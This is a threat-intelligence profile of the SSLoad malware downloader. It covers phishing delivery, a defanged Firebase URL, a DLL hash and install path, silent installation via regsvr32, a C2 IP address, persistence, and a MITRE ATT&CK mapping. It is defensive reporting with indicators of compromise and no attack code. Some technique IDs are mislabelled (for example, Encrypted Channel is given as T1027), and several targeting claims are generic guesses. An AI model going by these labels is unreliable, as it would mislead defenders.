SSLoad (Dropper) – Malware

Overview

SSLoad, a Rust-based downloader that emerged in January 2024, has quickly evolved to become a prominent tool in cybercriminal arsenals. This malware, attributed to threat actor group TA578, has undergone several iterations since its inception. Initially leveraging a two-stage infection process involving a DLL and Telegram-based C2 communication, SSLoad now operates with increased efficiency and stealth, delivering secondary payloads with minimal external dependencies.

Targets

Organizations with Poor Security Posture: SSLoad has been observed targeting entities with weak security practices, such as outdated software, misconfigured systems, or inadequate network defenses. This often includes businesses and institutions that may not have robust cybersecurity measures in place.

Sectors with High Value: While specific sectors were not detailed in the initial reports, malware like SSLoad typically aims at high-value sectors. These can include financial institutions, healthcare organizations, government agencies, and technology companies. The goal is to compromise systems that hold valuable data or have significant operational impact.

Geographical Focus: There is no detailed geographical focus mentioned for SSLoad; however, given its initial deployment and the nature of its targets, it is likely to have a broad geographic reach. The malware’s evolution and distribution may target regions with less stringent cybersecurity regulations or higher instances of vulnerable systems.

Specific Campaigns and Delivery Methods: In one observed campaign, SSLoad was delivered via phishing emails that were disguised as contact form submissions from legitimate organizations. This tactic suggests that SSLoad is used in targeted attacks where attackers exploit specific vulnerabilities or weaknesses in their victims’ communication channels.

How they operate

Infection Chain and Initial Access

The SSLoad malware initiates its attack vector through phishing emails, which often appear as benign communications from contact forms on targeted organizations’ websites. These emails contain URLs leading to counterfeit Azure download pages or other deceptive sites. Upon clicking these links, victims are redirected to Firebase-hosted URLs that serve malicious JavaScript (.js) files. For instance, examples of such Firebase URLs include hxxps://firebasestorage.googleapis.com/v0/b/terfe-419414.appspot.com/o/I3Hl2Mxyqs%2FLetter_b23_98b161159-63t511248325-3676a8.js, which, when executed, download a Microsoft Installer (.msi) file.

Execution and Installation

Once the victim executes the .js file, it triggers the wscript.exe process to download and execute the .msi file from a WebDAV server. The .msi file is designed to install and run an SSLoad Dynamic Link Library (DLL). This DLL, with a SHA256 hash of 09ffc4188bf11bf059b616491fcb8a09a474901581f46ec7f2c350fbda4e1e1c, is located in the user’s AppData folder, under the path C:\Users\[username]\AppData\Local\sharepoint\MenuEx.dll. The installation is carried out silently using regsvr32.exe, a method that helps evade user detection and Windows Defender.

Command-and-Control Communication

SSLoad’s command-and-control infrastructure is designed to operate discreetly. Early versions of the malware used a Telegram channel named ‘SSLoad’ to fetch additional URLs for further payload retrieval. More recent iterations have refined this approach, eliminating the need for a first-stage DLL. Instead, SSLoad now loads directly onto the victim’s machine and communicates with its C2 servers over encrypted channels. The malware employs methods such as using HTTPS traffic for secure communication and obfuscating its data transmissions to avoid detection. Notable C2 traffic includes interactions with IPs like 85.239.53.219 and services such as api.ipify.org, where the malware sends and receives commands and data.

Persistence and Evasion Techniques

SSLoad incorporates several persistence mechanisms to ensure it remains operational even after system reboots. One such method involves creating scheduled tasks or modifying startup entries to automatically execute the malware upon system startup. Additionally, the malware uses advanced evasion techniques, including obfuscation and encryption of its payloads, to hinder detection by traditional security measures. For instance, the payloads are often encrypted and executed directly in memory, reducing their footprint on disk and making them harder to analyze.

MITRE Tactics and Techniques

1. Initial Access

Phishing (T1566): SSLoad is initially delivered through phishing emails, often disguised as legitimate communication (e.g., contact forms). This technique involves sending malicious links or attachments to trick recipients into executing the malware.

2. Execution

User Execution (T1203): The malware relies on the user to execute a JavaScript (.js) file, which then downloads and runs the SSLoad payload. This method leverages user interaction to trigger malware execution.

3. Persistence

Scheduled Task/Job (T1053): SSLoad establishes persistence by creating a scheduled task or modifying startup entries to ensure it remains on the system after reboot.

4. Command and Control

Encrypted Channel (T1027): SSLoad uses encrypted channels to communicate with its command and control (C2) server. This includes encrypting its traffic to evade detection and analysis.

Web Service (T1102): SSLoad has been seen using legitimate services (such as Firebase or Telegram channels) to host or retrieve components. This method can obscure the malware’s activity and make it harder to detect.

5. Collection

Data from Local System (T1005): The malware can potentially be used to gather data from the infected system, though the specific data collection techniques used by SSLoad were not detailed.

6. Exfiltration

Exfiltration Over Command and Control Channel (T1041): SSLoad can exfiltrate data over the same channel used for C2 communication, utilizing the encrypted traffic to send collected information back to the attackers.

7. Defense Evasion

Obfuscated Files or Information (T1027): SSLoad uses various techniques to obfuscate its presence, including encrypted payloads and disguising itself as legitimate files.

8. Privilege Escalation

Process Injection (T1055): Although not explicitly mentioned, malware like SSLoad may use process injection techniques to run its payload in a way that avoids detection.

References

• PaloAltoNetworks/Unit42-timely-threat-intel
• SSLoad